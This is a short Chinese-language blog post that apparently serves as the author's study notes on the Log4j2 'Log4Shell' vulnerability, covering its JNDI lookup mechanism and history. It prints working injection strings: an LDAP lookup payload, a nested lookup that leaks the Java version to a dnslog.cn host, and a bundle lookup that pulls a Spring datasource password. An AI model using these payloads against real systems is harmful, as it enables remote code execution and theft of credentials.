<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/facion.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/facion.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" integrity="sha256-Vzbj7sDDS/woiFS3uNKo8eIuni59rjyNGtXfstRzStA=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","version":"8.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="对java安全也不是很熟，平时也只是看一下攻击的姿势。但这次毕竟安全圈大事，凑个热闹 简单学习下原理。国外将其命名为 Log4Shell 前置结构：从上往下看 每一层  Java AppJndi ApiNaming MangerJndi apiLadp Dns  Rmi Corba 发展历程 2013年就存在的漏洞1.2013年，有人向Log4j2开源社区提交支持JNDI Lookup 插件的请求">
<meta property="og:type" content="article">
<meta property="og:title" content="Log4j2 相关总结(待修改，补充)">
<meta property="og:url" content="http://example.com/2022/01/01/Log4j2%E7%9B%B8%E5%85%B3%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="Kid">
<meta property="og:description" content="对java安全也不是很熟，平时也只是看一下攻击的姿势。但这次毕竟安全圈大事，凑个热闹 简单学习下原理。国外将其命名为 Log4Shell 前置结构：从上往下看 每一层  Java AppJndi ApiNaming MangerJndi apiLadp Dns  Rmi Corba 发展历程 2013年就存在的漏洞1.2013年，有人向Log4j2开源社区提交支持JNDI Lookup 插件的请求">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-01-01T09:33:00.000Z">
<meta property="article:modified_time" content="2022-01-02T18:14:08.766Z">
<meta property="article:author" content="Kid">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2022/01/01/Log4j2%E7%9B%B8%E5%85%B3%E6%80%BB%E7%BB%93/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2022/01/01/Log4j2%E7%9B%B8%E5%85%B3%E6%80%BB%E7%BB%93/","path":"2022/01/01/Log4j2相关总结/","title":"Log4j2 相关总结(待修改，补充)"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Log4j2 相关总结(待修改，补充) | Kid</title>
  

  <script src="/js/third-party/analytics/baidu-analytics.js"></script>
  <script async src="https://hm.baidu.com/hm.js?79e001c562930051eed3b74457adcf40"></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Kid</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">IOT IOS ANDORIOD WEB  Security</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">0</span></a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">8</span></a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE"><span class="nav-number">1.</span> <span class="nav-text">前置</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%93%E6%9E%84%EF%BC%9A"><span class="nav-number">1.1.</span> <span class="nav-text">结构：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%91%E5%B1%95%E5%8E%86%E7%A8%8B-2013%E5%B9%B4%E5%B0%B1%E5%AD%98%E5%9C%A8%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.2.</span> <span class="nav-text">发展历程 2013年就存在的漏洞</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%97%AE%E9%A2%98%E6%A0%B8%E5%BF%83"><span class="nav-number">2.</span> <span class="nav-text">问题核心</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Lookup"><span class="nav-number">2.1.</span> <span class="nav-text">Lookup</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Jndi-%E7%9A%84%E5%8A%A8%E6%80%81%E5%8D%8F%E8%AE%AE%E5%88%87%E6%8D%A2%EF%BC%88%E6%AD%A3%E5%B8%B8%E5%8A%9F%E8%83%BD%EF%BC%89"><span class="nav-number">2.2.</span> <span class="nav-text">Jndi 的动态协议切换（正常功能）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E5%8E%9F%E7%90%86"><span class="nav-number">2.3.</span> <span class="nav-text">简单原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E5%A7%BF%E5%8A%BF"><span class="nav-number">2.4.</span> <span class="nav-text">其他姿势</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-overview">
            <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Kid"
      src="/images/head.png">
  <p class="site-author-name" itemprop="name">Kid</p>
  <div class="site-description" itemprop="description">行到水穷处，坐看云起时</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



          </div>
        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/01/01/Log4j2%E7%9B%B8%E5%85%B3%E6%80%BB%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/head.png">
      <meta itemprop="name" content="Kid">
      <meta itemprop="description" content="行到水穷处，坐看云起时">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Kid">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Log4j2 相关总结(待修改，补充)
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-01-01 09:33:00" itemprop="dateCreated datePublished" datetime="2022-01-01T09:33:00Z">2022-01-01</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2022-01-02 18:14:08" itemprop="dateModified" datetime="2022-01-02T18:14:08Z">2022-01-02</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>对java安全也不是很熟，平时也只是看一下攻击的姿势。<br>但这次毕竟安全圈大事，凑个热闹 简单学习下原理。<br>国外将其命名为 Log4Shell</p>
<h1 id="前置"><a href="#前置" class="headerlink" title="前置"></a>前置</h1><h2 id="结构："><a href="#结构：" class="headerlink" title="结构："></a>结构：</h2><p>从上往下看 每一层 </p>
<p>Java App<br>Jndi Api<br>Naming Manger<br>Jndi api<br>Ladp Dns  Rmi Corba</p>
<h2 id="发展历程-2013年就存在的漏洞"><a href="#发展历程-2013年就存在的漏洞" class="headerlink" title="发展历程 2013年就存在的漏洞"></a>发展历程 2013年就存在的漏洞</h2><p>1.2013年，有人向Log4j2开源社区提交支持JNDI Lookup 插件的请求并被采纳</p>
<p>2.2016年 首次黑客大会介绍Jndi<br><a target="_blank" rel="noopener" href="https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf">https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf</a></p>
<p>3.2021年爆发</p>
<p>ps：个人觉得，其实这个洞应该早就被利用了，只是在某种利益的情况，被爆了出来。<br>    好多-1day 都掌握在某些人或团队手里</p>
<h1 id="问题核心"><a href="#问题核心" class="headerlink" title="问题核心"></a>问题核心</h1><h2 id="Lookup"><a href="#Lookup" class="headerlink" title="Lookup"></a>Lookup</h2><h2 id="Jndi-的动态协议切换（正常功能）"><a href="#Jndi-的动态协议切换（正常功能）" class="headerlink" title="Jndi 的动态协议切换（正常功能）"></a>Jndi 的动态协议切换（正常功能）</h2><p> Log4j-core 自带的lookup有很多实例<br> log4j2是Java 日志开发框架 1.x 重写的。</p>
<h2 id="简单原理"><a href="#简单原理" class="headerlink" title="简单原理"></a>简单原理</h2><p> 日志打印 遇到 ${ 分割执行<br> logger.error(“error_message:${jndi:ldap://xxx/class}”);<br> 变成<br> jndi:ldap://xxx/xxx  进入存在漏洞的 JndiLookup 实例,用 InitialContext.lookup去访问<br> 导致jndi代码执行</p>
<h2 id="其他姿势"><a href="#其他姿势" class="headerlink" title="其他姿势"></a>其他姿势</h2><p>   “ElasticSearch利用Java的SecurityManager安全机制来防御文件操作和Socket操作，所以无法正常连接远程服务器”<br>   p牛的研究。所以其实有些有RASP，SecurityManager是无法rce的。</p>
<p>   本地信息泄漏，报错回显：<br>   System.getProperty() ，System.getenv()，ResourceBundleLookup</p>
<p>   展开来说：<br>   1.嵌套标签<br>    ${jndi:ldap://${java:version}.u2xf5m.dnslog.cn}<br>   2.sys env<br>    参考：<a target="_blank" rel="noopener" href="https://github.com/jas502n/Log4j2-CVE-2021-44228">https://github.com/jas502n/Log4j2-CVE-2021-44228</a><br>   3.Bundle<br>    参考：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg">https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg</a><br>    ${bundle:application:spring.datasource.password}<br>    条件：springboot加入log4j2依赖</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div></div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="Kid 微信">
        <span>微信</span>
      </div>

  </div>
</div>

          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Kid
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://example.com/2022/01/01/Log4j2%E7%9B%B8%E5%85%B3%E6%80%BB%E7%BB%93/" title="Log4j2 相关总结(待修改，补充)">http://example.com/2022/01/01/Log4j2相关总结/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/12/06/arm64-hello,world/" rel="prev" title="arm64汇编(1)">
                  <i class="fa fa-chevron-left"></i> arm64汇编(1)
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Kid</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>
-->
    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" integrity="sha256-yt2kYMy0w8AbtF89WXb2P1rfjcP/HTHLT7097U8Y5b8=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  



  <script src="/js/third-party/fancybox.js"></script>

  





</body>
</html>
